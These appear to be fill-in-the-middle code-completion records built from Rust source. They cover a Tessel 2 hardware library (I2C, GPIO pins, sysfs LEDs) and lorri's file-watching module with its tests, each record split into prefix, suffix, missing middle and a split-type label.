fn stop(&self, sock: &mut MutexGuard<PortSocket>) {
// Tell I2C to send STOP condition
sock.write_command(Command::Stop).unwrap();
}
pub fn send(&mut self, address: u8, write_buf: &[u8]) {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.stop(&mut sock);
}
pub fn read(&mut self, address: u8, read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
pub fn transfer(&mut self, address: u8, write_buf: &[u8], read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
}
// TODO: Figure out how to override the path secretly so the example
// can actually be run.
/// A LED models an LED on the Tessel board.
/// # Example
/// ```rust,no_run
/// use tessel::LED;
///
/// let mut led = LED::new("red", "error");
/// // LEDs are off by default.
/// assert_eq!(false, led.read());
/// led.on().unwrap();
/// assert_eq!(true, led.read());
pub struct LED {
// The file object we write to in order to change state.
file: File,
// The current value of the LED, defaults to false.
value: bool,
}
impl LED {
pub fn new(color: &'static str, kind: &'static str) -> LED {
let path = format!("/sys/devices/leds/leds/tessel:{}:{}/brightness",
color,
kind);
// Open the file for write operations.
LED::new_with_file(File::create(path).unwrap())
}
fn new_with_file(file: File) -> LED {
let mut led = LED {
value: false,
file: file,
};
// Turn the LED off by default.
led.off().unwrap();
led
}
// Turn the LED on (same as `high`).
pub fn on(&mut self) -> Result<(), io::Error> {
self.high()
}
// Turn the LED off (same as `low`).
pub fn off(&mut self) -> Result<(), io::Error> {
self.low()
}
// Turn the LED on.
pub fn high(&mut self) -> Result<(), io::Error> {
self.write(true)
}
// Turn the LED off.
pub fn low(&mut self) -> Result<(), io::Error> {
self.write(false)
}
// Sets the LED to the opposite of its current state.
pub fn toggle(&mut self) -> Result<(), io::Error> {
let new_value = !self.value;
self.write(new_value)
}
// Returns the current state of the LED.
pub fn read(&self) -> bool {
self.value
}
// Helper function to write new state to LED filepath.
fn write(&mut self, new_value: bool) -> Result<(), io::Error> {
// Save the new value to the model.
self.value = new_value;
// Return the binary representation of that value type.
let string_value = match new_value {
true => b'1',
false => b'0',
};
// Write that data to the file and return the result.
self.file.write_all(&[string_value])
}
}
#[cfg(test)]
mod tests {
extern crate tempfile;
use super::*;
use std::io::{Read, Seek, SeekFrom};
#[test]
fn led_writes_to_file() {
let mut tmpfile = tempfile::tempfile().unwrap();
// The tmpfile handle can be reused as long as LED gets its own
// clone of the handle, and we are diligent about seeking.
// This avoids needing to figure out where the tmpfile is in order
// to open more handles.
let mut led = LED::new_with_file(tmpfile.try_clone().unwrap());
let mut buf = String::new();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
assert_eq!("0", buf);
led.on().unwrap();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
// b'1' is written as 001 into the file.
assert_eq!("001", buf);
}
}
| {
let mut sock = self.socket.lock().unwrap();
sock.write_command(Command::EnableI2C{ baud: baud }).unwrap();
} | identifier_body |
lib.rs | extern crate unix_socket;
pub mod protocol;
use protocol::{Command, reply, PortSocket};
use std::collections::HashMap;
use std::fs::File;
use std::io;
use std::io::prelude::*;
use std::sync::Arc;
use std::sync::{Mutex, MutexGuard, TryLockError};
use std::u8;
// TODO Corking reduces latency, as spid adds overhead for each packet
// Paths to the SPI daemon sockets with incoming data from coprocessor.
const PORT_A_UDS_PATH: &'static str = "/var/run/tessel/port_a";
const PORT_B_UDS_PATH: &'static str = "/var/run/tessel/port_b";
const MCU_MAX_SPEED: u32 = 48e6 as u32;
// TODO: Replace with better name
const MCU_MAX_SCL_RISE_TIME_NS: f64 = 1.5e-8 as f64;
const MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD: u8 = 2;
const MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD: u8 = 5;
/// Primary exported Tessel object with access to module ports, LEDs, and a button.
/// # Example
/// ```
/// use tessel::Tessel;
///
/// # #[allow(dead_code)]
/// # fn example() {
/// let t = Tessel::new();
/// // Tessel 2 has four LEDs available.
/// assert_eq!(t.led.len(), 4);
/// // Tessel 2 has two ports labelled a and b
/// let a = t.port.a;
/// let b = t.port.b;
/// # }
/// ```
pub struct Tessel {
// A group of module ports.
pub port: PortGroup,
// An array of LED structs.
pub led: Vec<LED>,
}
impl Tessel {
// new() returns a Tessel struct conforming to the Tessel 2's functionality.
pub fn new() -> Tessel {
// Create a port group with two ports, one on each domain socket path.
let ports = PortGroup {
a: Port::new(PORT_A_UDS_PATH),
b: Port::new(PORT_B_UDS_PATH),
};
// Create models for the four LEDs.
let red_led = LED::new("red", "error");
let amber_led = LED::new("amber", "wlan");
let green_led = LED::new("green", "user1");
let blue_led = LED::new("blue", "user2");
// Return the Tessel with these fields.
Tessel {
port: ports,
led: vec![red_led, amber_led, green_led, blue_led],
}
}
}
/// A PortGroup is a simple way to access each port through its letter identifier.
#[allow(dead_code)]
pub struct PortGroup {
pub a: Port,
pub b: Port,
}
/// A Port is a model of the Tessel hardware ports.
/// # Example
/// ```
/// use tessel::Port;
/// ```
pub struct Port {
// Path of the domain socket.
socket: Arc<Mutex<PortSocket>>,
pins: HashMap<usize, Mutex<()>>,
}
pub struct Pin<'a> {
index: usize,
_guard: MutexGuard<'a, ()>,
socket: Arc<Mutex<PortSocket>>,
}
impl<'a> Pin<'a> {
pub fn output(&mut self, value: bool) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
if value {
sock.write_command(Command::GpioHigh(self.index as u8))
} else {
sock.write_command(Command::GpioLow(self.index as u8))
}
}
}
impl Port {
pub fn new(path: &str) -> Port {
let mut pins = HashMap::new();
for i in 0..8 {
pins.insert(i, Mutex::new(()));
}
// Create and return the port struct
Port {
socket: Arc::new(Mutex::new(PortSocket::new(path))),
pins: pins,
}
}
pub fn pin(&self, index: usize) -> Result<Pin, TryLockError<MutexGuard<()>>> {
Ok(Pin {
index: index,
_guard: try!(self.pins.get(&index).expect("TODO dont panic on pin fetch").lock()),
socket: self.socket.clone(),
})
}
pub fn i2c(&self, frequency: u32) -> Result<I2C, TryLockError<MutexGuard<()>>> {
let scl = try!(self.pin(0));
let sda = try!(self.pin(1));
Ok(I2C::new(self.socket.clone(), scl, sda, frequency))
}
}
pub struct I2C<'p> {
socket: Arc<Mutex<PortSocket>>,
_scl: Pin<'p>,
_sda: Pin<'p>,
pub frequency: u32,
}
impl<'p> I2C<'p> {
// TODO: make frequency optional
fn new<'a>(socket: Arc<Mutex<PortSocket>>, scl: Pin<'a>, sda: Pin<'a>, frequency: u32) -> I2C<'a> {
let baud: u8 = I2C::compute_baud(frequency);
let mut i2c = I2C {
socket: socket,
_scl: scl,
_sda: sda,
frequency: frequency,
};
i2c.enable(baud);
i2c
}
/// Computes the baudrate as used on the Atmel SAMD21 I2C register
/// to set the frequency of the I2C Clock.
fn compute_baud(frequency: u32) -> u8 {
let mut intermediate: f64 = MCU_MAX_SPEED as f64 / frequency as f64;
intermediate = intermediate - MCU_MAX_SPEED as f64 * MCU_MAX_SCL_RISE_TIME_NS;
// TODO: Do not hardcode these numbers
intermediate = intermediate / MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD as f64 -
MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD as f64;
// Return either the intermediate value or 255
let low = intermediate.min(u8::max_value() as f64);
// If we have a potentially negative register value
// Casting as i64 because .float does not seem to work
if (low as i64) < u8::min_value() as i64 {
// Use 0 instead
return u8::min_value();
} else {
// Return the new register value
return low as u8;
}
}
fn enable(&mut self, baud: u8) {
let mut sock = self.socket.lock().unwrap();
sock.write_command(Command::EnableI2C{ baud: baud }).unwrap();
}
fn tx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, write_buf: &[u8]) {
sock.write_command(Command::Start(address<<1)).unwrap();
// Write the command and data
sock.write_command(Command::Tx(write_buf)).unwrap();
}
fn rx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, read_buf: &mut [u8]) {
sock.write_command(Command::Start(address << 1 | 1)).unwrap();
// Write the command and transfer length
sock.write_command(Command::Rx(read_buf.len() as u8)).unwrap();
}
fn stop(&self, sock: &mut MutexGuard<PortSocket>) {
// Tell I2C to send STOP condition
sock.write_command(Command::Stop).unwrap();
}
pub fn send(&mut self, address: u8, write_buf: &[u8]) {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.stop(&mut sock);
}
pub fn read(&mut self, address: u8, read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
pub fn transfer(&mut self, address: u8, write_buf: &[u8], read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
}
// TODO: Figure out how to override the path secretly so the example
// can actually be run.
/// A LED models an LED on the Tessel board.
/// # Example
/// ```rust,no_run
/// use tessel::LED;
///
/// let mut led = LED::new("red", "error");
/// // LEDs are off by default.
/// assert_eq!(false, led.read());
/// led.on().unwrap();
/// assert_eq!(true, led.read());
pub struct LED {
// The file object we write to in order to change state.
file: File,
// The current value of the LED, defaults to false.
value: bool,
}
impl LED {
pub fn new(color: &'static str, kind: &'static str) -> LED {
let path = format!("/sys/devices/leds/leds/tessel:{}:{}/brightness",
color,
kind);
// Open the file for write operations.
LED::new_with_file(File::create(path).unwrap())
}
fn new_with_file(file: File) -> LED {
let mut led = LED {
value: false,
file: file,
};
// Turn the LED off by default.
led.off().unwrap();
led
}
// Turn the LED on (same as `high`).
pub fn on(&mut self) -> Result<(), io::Error> {
self.high()
}
// Turn the LED off (same as `low`).
pub fn off(&mut self) -> Result<(), io::Error> {
self.low()
}
// Turn the LED on.
pub fn high(&mut self) -> Result<(), io::Error> {
self.write(true)
}
// Turn the LED off.
pub fn low(&mut self) -> Result<(), io::Error> {
self.write(false)
}
// Sets the LED to the opposite of its current state.
pub fn | (&mut self) -> Result<(), io::Error> {
let new_value = !self.value;
self.write(new_value)
}
// Returns the current state of the LED.
pub fn read(&self) -> bool {
self.value
}
// Helper function to write new state to LED filepath.
fn write(&mut self, new_value: bool) -> Result<(), io::Error> {
// Save the new value to the model.
self.value = new_value;
// Return the binary representation of that value type.
let string_value = match new_value {
true => b'1',
false => b'0',
};
// Write that data to the file and return the result.
self.file.write_all(&[string_value])
}
}
#[cfg(test)]
mod tests {
extern crate tempfile;
use super::*;
use std::io::{Read, Seek, SeekFrom};
#[test]
fn led_writes_to_file() {
let mut tmpfile = tempfile::tempfile().unwrap();
// The tmpfile handle can be reused as long as LED gets its own
// clone of the handle, and we are diligent about seeking.
// This avoids needing to figure out where the tmpfile is in order
// to open more handles.
let mut led = LED::new_with_file(tmpfile.try_clone().unwrap());
let mut buf = String::new();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
assert_eq!("0", buf);
led.on().unwrap();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
// b'1' is written as 001 into the file.
assert_eq!("001", buf);
}
}
| toggle | identifier_name |
lib.rs | extern crate unix_socket;
pub mod protocol;
use protocol::{Command, reply, PortSocket};
use std::collections::HashMap;
use std::fs::File;
use std::io;
use std::io::prelude::*;
use std::sync::Arc;
use std::sync::{Mutex, MutexGuard, TryLockError};
use std::u8;
// TODO Corking reduces latency, as spid adds overhead for each packet
// Paths to the SPI daemon sockets with incoming data from coprocessor.
const PORT_A_UDS_PATH: &'static str = "/var/run/tessel/port_a";
const PORT_B_UDS_PATH: &'static str = "/var/run/tessel/port_b";
const MCU_MAX_SPEED: u32 = 48e6 as u32;
// TODO: Replace with better name
const MCU_MAX_SCL_RISE_TIME_NS: f64 = 1.5e-8 as f64;
const MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD: u8 = 2;
const MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD: u8 = 5;
/// Primary exported Tessel object with access to module ports, LEDs, and a button.
/// # Example
/// ```
/// use tessel::Tessel;
///
/// # #[allow(dead_code)]
/// # fn example() {
/// let t = Tessel::new();
/// // Tessel 2 has four LEDs available.
/// assert_eq!(t.led.len(), 4);
/// // Tessel 2 has two ports labelled a and b
/// let a = t.port.a;
/// let b = t.port.b;
/// # }
/// ``` | pub port: PortGroup,
// An array of LED structs.
pub led: Vec<LED>,
}
impl Tessel {
// new() returns a Tessel struct conforming to the Tessel 2's functionality.
pub fn new() -> Tessel {
// Create a port group with two ports, one on each domain socket path.
let ports = PortGroup {
a: Port::new(PORT_A_UDS_PATH),
b: Port::new(PORT_B_UDS_PATH),
};
// Create models for the four LEDs.
let red_led = LED::new("red", "error");
let amber_led = LED::new("amber", "wlan");
let green_led = LED::new("green", "user1");
let blue_led = LED::new("blue", "user2");
// Return the Tessel with these fields.
Tessel {
port: ports,
led: vec![red_led, amber_led, green_led, blue_led],
}
}
}
/// A PortGroup is a simple way to access each port through its letter identifier.
#[allow(dead_code)]
pub struct PortGroup {
pub a: Port,
pub b: Port,
}
/// A Port is a model of the Tessel hardware ports.
/// # Example
/// ```
/// use tessel::Port;
/// ```
pub struct Port {
// Path of the domain socket.
socket: Arc<Mutex<PortSocket>>,
pins: HashMap<usize, Mutex<()>>,
}
pub struct Pin<'a> {
index: usize,
_guard: MutexGuard<'a, ()>,
socket: Arc<Mutex<PortSocket>>,
}
impl<'a> Pin<'a> {
pub fn output(&mut self, value: bool) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
if value {
sock.write_command(Command::GpioHigh(self.index as u8))
} else {
sock.write_command(Command::GpioLow(self.index as u8))
}
}
}
impl Port {
pub fn new(path: &str) -> Port {
let mut pins = HashMap::new();
for i in 0..8 {
pins.insert(i, Mutex::new(()));
}
// Create and return the port struct
Port {
socket: Arc::new(Mutex::new(PortSocket::new(path))),
pins: pins,
}
}
pub fn pin(&self, index: usize) -> Result<Pin, TryLockError<MutexGuard<()>>> {
Ok(Pin {
index: index,
_guard: try!(self.pins.get(&index).expect("TODO dont panic on pin fetch").lock()),
socket: self.socket.clone(),
})
}
pub fn i2c(&self, frequency: u32) -> Result<I2C, TryLockError<MutexGuard<()>>> {
let scl = try!(self.pin(0));
let sda = try!(self.pin(1));
Ok(I2C::new(self.socket.clone(), scl, sda, frequency))
}
}
pub struct I2C<'p> {
socket: Arc<Mutex<PortSocket>>,
_scl: Pin<'p>,
_sda: Pin<'p>,
pub frequency: u32,
}
impl<'p> I2C<'p> {
// TODO: make frequency optional
fn new<'a>(socket: Arc<Mutex<PortSocket>>, scl: Pin<'a>, sda: Pin<'a>, frequency: u32) -> I2C<'a> {
let baud: u8 = I2C::compute_baud(frequency);
let mut i2c = I2C {
socket: socket,
_scl: scl,
_sda: sda,
frequency: frequency,
};
i2c.enable(baud);
i2c
}
/// Computes the baudrate as used on the Atmel SAMD21 I2C register
/// to set the frequency of the I2C Clock.
fn compute_baud(frequency: u32) -> u8 {
let mut intermediate: f64 = MCU_MAX_SPEED as f64 / frequency as f64;
intermediate = intermediate - MCU_MAX_SPEED as f64 * MCU_MAX_SCL_RISE_TIME_NS;
// TODO: Do not hardcode these numbers
intermediate = intermediate / MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD as f64 -
MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD as f64;
// Return either the intermediate value or 255
let low = intermediate.min(u8::max_value() as f64);
// If we have a potentially negative register value
// Casting as i64 because .float does not seem to work
if (low as i64) < u8::min_value() as i64 {
// Use 0 instead
return u8::min_value();
} else {
// Return the new register value
return low as u8;
}
}
fn enable(&mut self, baud: u8) {
let mut sock = self.socket.lock().unwrap();
sock.write_command(Command::EnableI2C{ baud: baud }).unwrap();
}
fn tx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, write_buf: &[u8]) {
sock.write_command(Command::Start(address<<1)).unwrap();
// Write the command and data
sock.write_command(Command::Tx(write_buf)).unwrap();
}
fn rx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, read_buf: &mut [u8]) {
sock.write_command(Command::Start(address << 1 | 1)).unwrap();
// Write the command and transfer length
sock.write_command(Command::Rx(read_buf.len() as u8)).unwrap();
}
fn stop(&self, sock: &mut MutexGuard<PortSocket>) {
// Tell I2C to send STOP condition
sock.write_command(Command::Stop).unwrap();
}
pub fn send(&mut self, address: u8, write_buf: &[u8]) {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.stop(&mut sock);
}
pub fn read(&mut self, address: u8, read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
pub fn transfer(&mut self, address: u8, write_buf: &[u8], read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
}
// TODO: Figure out how to override the path secretly so the example
// can actually be run.
/// A LED models an LED on the Tessel board.
/// # Example
/// ```rust,no_run
/// use tessel::LED;
///
/// let mut led = LED::new("red", "error");
/// // LEDs are off by default.
/// assert_eq!(false, led.read());
/// led.on().unwrap();
/// assert_eq!(true, led.read());
pub struct LED {
// The file object we write to in order to change state.
file: File,
// The current value of the LED, defaults to false.
value: bool,
}
impl LED {
pub fn new(color: &'static str, kind: &'static str) -> LED {
let path = format!("/sys/devices/leds/leds/tessel:{}:{}/brightness",
color,
kind);
// Open the file for write operations.
LED::new_with_file(File::create(path).unwrap())
}
fn new_with_file(file: File) -> LED {
let mut led = LED {
value: false,
file: file,
};
// Turn the LED off by default.
led.off().unwrap();
led
}
// Turn the LED on (same as `high`).
pub fn on(&mut self) -> Result<(), io::Error> {
self.high()
}
// Turn the LED off (same as `low`).
pub fn off(&mut self) -> Result<(), io::Error> {
self.low()
}
// Turn the LED on.
pub fn high(&mut self) -> Result<(), io::Error> {
self.write(true)
}
// Turn the LED off.
pub fn low(&mut self) -> Result<(), io::Error> {
self.write(false)
}
// Sets the LED to the opposite of its current state.
pub fn toggle(&mut self) -> Result<(), io::Error> {
let new_value = !self.value;
self.write(new_value)
}
// Returns the current state of the LED.
pub fn read(&self) -> bool {
self.value
}
// Helper function to write new state to LED filepath.
fn write(&mut self, new_value: bool) -> Result<(), io::Error> {
// Save the new value to the model.
self.value = new_value;
// Return the binary representation of that value type.
let string_value = match new_value {
true => b'1',
false => b'0',
};
// Write that data to the file and return the result.
self.file.write_all(&[string_value])
}
}
#[cfg(test)]
mod tests {
extern crate tempfile;
use super::*;
use std::io::{Read, Seek, SeekFrom};
#[test]
fn led_writes_to_file() {
let mut tmpfile = tempfile::tempfile().unwrap();
// The tmpfile handle can be reused as long as LED gets its own
// clone of the handle, and we are diligent about seeking.
// This avoids needing to figure out where the tmpfile is in order
// to open more handles.
let mut led = LED::new_with_file(tmpfile.try_clone().unwrap());
let mut buf = String::new();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
assert_eq!("0", buf);
led.on().unwrap();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
// b'1' is written as 001 into the file.
assert_eq!("001", buf);
}
} | pub struct Tessel {
// A group of module ports. | random_line_split |
watch.rs | //! Recursively watch paths for changes, in an extensible and
//! cross-platform way.
use crate::NixFile;
use crossbeam_channel as chan;
use notify::event::ModifyKind;
use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher};
use slog_scope::{debug, info};
use std::collections::HashSet;
use std::path::{Path, PathBuf};
use std::time::Duration;
/// A dynamic list of paths to watch for changes, and
/// react to changes when they occur.
pub struct Watch {
/// Event receiver. Process using `Watch::process`.
pub rx: chan::Receiver<notify::Result<notify::Event>>,
notify: RecommendedWatcher,
watches: HashSet<PathBuf>,
}
/// A debug message string that can only be displayed via `Debug`.
#[derive(Clone, Debug, Serialize)]
pub struct DebugMessage(pub String);
#[derive(Debug, PartialEq, Eq)]
struct FilteredOut<'a> {
reason: &'a str,
path: PathBuf,
}
/// Description of the project change that triggered a build.
#[derive(Clone, Debug, Serialize)]
#[serde(rename_all = "snake_case")]
pub enum Reason {
/// When a project is presented to Lorri to track, it's built for this reason.
ProjectAdded(NixFile),
/// When a ping is received.
PingReceived,
/// When there is a filesystem change, the first changed file is recorded,
/// along with a count of other filesystem events.
FilesChanged(Vec<PathBuf>),
/// When the underlying notifier reports something strange.
UnknownEvent(DebugMessage),
}
/// We weren’t able to understand a `notify::Event`.
#[derive(Clone, Debug)]
pub enum EventError {
/// No message was received from the raw event channel
RxNoEventReceived,
/// The changed file event had no file path
EventHasNoFilePath(notify::Event),
}
impl Watch {
/// Instantiate a new Watch.
pub fn try_new() -> Result<Watch, notify::Error> {
let (tx, rx) = chan::unbounded();
Ok(Watch {
notify: Watcher::new(tx, Duration::from_millis(100))?,
watches: HashSet::new(),
rx,
})
}
/// Process `notify::Event`s coming in via `Watch::rx`.
///
/// `None` if there were no relevant changes.
pub fn process(
&self,
event: notify::Result<notify::Event>,
) -> Option<Result<Reason, EventError>> {
match event {
Err(err) => panic!("notify error: {}", err),
Ok(event) => {
self.log_event(&event);
if event.paths.is_empty() {
Some(Err(EventError::EventHasNoFilePath(event)))
} else {
let notify::Event { paths, kind, .. } = event;
let interesting_paths: Vec<PathBuf> = paths
.into_iter()
.filter(|p| self.path_is_interesting(p, &kind))
.collect();
if !interesting_paths.is_empty() {
Some(Ok(Reason::FilesChanged(interesting_paths)))
} else {
None
}
}
}
}
}
/// Extend the watch list with an additional list of paths.
/// Note: Watch maintains a list of already watched paths, and
/// will not add duplicates.
pub fn extend(&mut self, paths: Vec<PathBuf>) -> Result<(), notify::Error> {
for path in paths {
let recursive_paths = walk_path_topo(path)?;
for p in recursive_paths {
let p = p.canonicalize()?;
match Self::extend_filter(p) {
Err(FilteredOut { reason, path }) => {
debug!("Skipping watching {}: {}", path.display(), reason)
}
Ok(p) => {
self.add_path(p)?;
}
}
}
}
Ok(())
}
fn extend_filter(path: PathBuf) -> Result<PathBuf, FilteredOut<'static>> {
if path.starts_with(Path::new("/nix/store")) {
Err(FilteredOut {
path,
reason: "starts with /nix/store",
})
} else {
Ok(path)
}
}
fn log_event(&self, event: ¬ify::Event) {
debug!("Watch Event: {:#?}", event);
match &event.kind {
notify::event::EventKind::Remove(_) if !event.paths.is_empty() => {
info!("identified removal: {:?}", &event.paths);
}
_ => {
debug!("watch event"; "event" => ?event);
}
}
}
fn add_path(&mut self, path: PathBuf) -> Result<(), notify::Error> {
if !self.watches.contains(&path) {
debug!("watching path"; "path" => path.to_str());
self.notify.watch(&path, RecursiveMode::NonRecursive)?;
self.watches.insert(path.clone());
}
if let Some(parent) = path.parent() {
if !self.watches.contains(parent) {
debug!("watching parent path"; "parent_path" => parent.to_str());
self.notify.watch(&parent, RecursiveMode::NonRecursive)?;
}
}
Ok(())
}
fn path_is_interesting(&self, path: &PathBuf, kind: &EventKind) -> bool {
path_match(&self.watches, path)
&& match kind {
// We ignore metadata modification events for the profiles directory
// tree as it is a symlink forest that is used to keep track of
// channels and nix will uconditionally update the metadata of each
// link in this forest. See https://github.com/NixOS/nix/blob/629b9b0049363e091b76b7f60a8357d9f94733cc/src/libstore/local-store.cc#L74-L80
// for the unconditional update. These metadata modification events are
// spurious annd they can easily cause a rebuild-loop when a shell.nix
// file does not pin its version of nixpkgs or other channels. When
// a Nix channel is updated we receive many other types of events, so
// ignoring these metadata modifications will not impact lorri's
// ability to correctly watch for channel changes.
EventKind::Modify(ModifyKind::Metadata(_)) => {
if path.starts_with(Path::new("/nix/var/nix/profiles/per-user")) {
debug!("ignoring spurious metadata change event within the profiles dir"; "path" => path.to_str());
false
} else {
true
}
}
_ => true,
}
}
}
/// Lists the dirs and files in a directory, as two vectors.
/// Given path must be a readable directory.
fn list_dir(dir: &Path) -> Result<(Vec<PathBuf>, Vec<PathBuf>), std::io::Error> {
let mut dirs = vec![];
let mut files = vec![];
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
if entry.file_type()?.is_dir() {
dirs.push(entry.path())
} else {
files.push(entry.path())
}
}
Ok((dirs, files))
}
/// List all children of the given path.
/// Recurses into directories.
///
/// Returns the given path first, then a topologically sorted list of children, if any.
///
/// All files have to be readable, or the function aborts.
/// TODO: gracefully skip unreadable files.
fn walk_path_topo(path: PathBuf) -> Result<Vec<PathBuf>, std::io::Error> {
// push our own path first
let mut res = vec![path.clone()];
// nothing to list
if !path.is_dir() {
return Ok(res);
}
let (dirs, mut files) = list_dir(&path)?;
// plain files
res.append(&mut files);
// now to go through the list, appending new
// directories to the work queue as you find them.
let mut work = std::collections::VecDeque::from(dirs);
loop {
match work.pop_front() {
// no directories remaining
None => break,
Some(dir) => {
res.push(dir.clone());
let (dirs, mut files) = list_dir(&dir)?;
res.append(&mut files);
work.append(&mut std::collections::VecDeque::from(dirs));
}
}
}
Ok(res)
}
/// Determine if the event path is covered by our list of watched
/// paths.
///
/// Returns true if:
/// - the event's path directly names a path in our
/// watch list
/// - the event's path names a canonicalized path in our watch list
/// - the event's path's parent directly names a path in our watch
/// list
/// - the event's path's parent names a canonicalized path in our
/// watch list
fn path_match(watched_paths: &HashSet<PathBuf>, event_path: &Path) -> bool {
let event_parent = event_path.parent();
let matches = |watched: &Path| {
if event_path == watched {
debug!(
"event path directly matches watched path";
"event_path" => event_path.to_str());
return true;
}
if let Some(parent) = event_parent {
if parent == watched {
debug!(
"event path parent matches watched path";
"event_path" => event_path.to_str(), "parent_path" => parent.to_str());
return true;
}
}
false
};
watched_paths.iter().any(|watched| {
if matches(watched) {
return true;
}
if let Ok(canonicalized_watch) = watched.canonicalize() {
if matches(&canonicalized_watch) {
return true;
}
}
false
})
}
#[cfg(test)]
mod tests {
use super::{EventError, Reason, Watch};
use crate::bash::expect_bash;
use std::path::PathBuf;
use std::thread::sleep;
use std::time::Duration;
use tempfile::tempdir;
/// upper bound of watcher (if it’s hit, something is broken)
fn upper_watcher_timeout() -> Duration {
// CI machines are very slow sometimes.
Duration::from_millis(1000)
}
/// Collect all notifications
fn process_all(watch: &Watch) -> Vec<Option<Result<Reason, EventError>>> {
watch.rx.try_iter().map(|e| watch.process(e)).collect()
}
/// Returns true iff the given file has changed
fn file_changed(watch: &Watch, file_name: &str) -> (bool, Vec<Reason>) {
let mut reasons = Vec::new();
let mut changed = false;
for event in process_all(watch) {
if let Some(Ok(reason)) = event {
reasons.push(reason.clone());
if let Reason::FilesChanged(files) = reason {
changed = changed
|| files
.iter()
.map(|p| p.file_name())
.filter(|f| f.is_some())
.map(|f| f.unwrap())
.any(|f| f == file_name)
}
}
}
(changed, reasons)
}
fn assert_file_changed(watch: &Watch, file_name: &str) {
let (file_changed, events) = file_changed(watch, file_name);
assert!(
file_changed,
"no file change notification for '{}'; these events occurred instead: {:?}",
file_name, events
);
}
/// Returns true iff there were no changes
fn no_changes(watch: &Watch) -> bool {
process_all(watch).iter().filter(|e| e.is_some()).count() == 0
}
#[cfg(target_os = "macos")]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// Sometimes a brand new watch will send a CREATE notification
// for a file which was just created, even if the watch was
// created after the file was made.
//
// Our tests want to be very precise about which events are
// received when, so expect these initial events and swallow
// them.
//
// Note, this is racey in the kernel. Otherwise I'd assert
// this is empty.
sleep(upper_watcher_timeout());
process_all(watcher).is_empty();
}
#[cfg(not(target_os = "macos"))]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// If we're supposedly dealing with a late notification on
// macOS, we'd better not receive any messages on other
// platforms.
//
// If we do receive any notifications, our test is broken.
sleep(upper_watcher_timeout());
assert!(process_all(watcher).is_empty());
}
#[test]
fn trivial_watch_whole_directory() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().to_path_buf()]).unwrap();
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
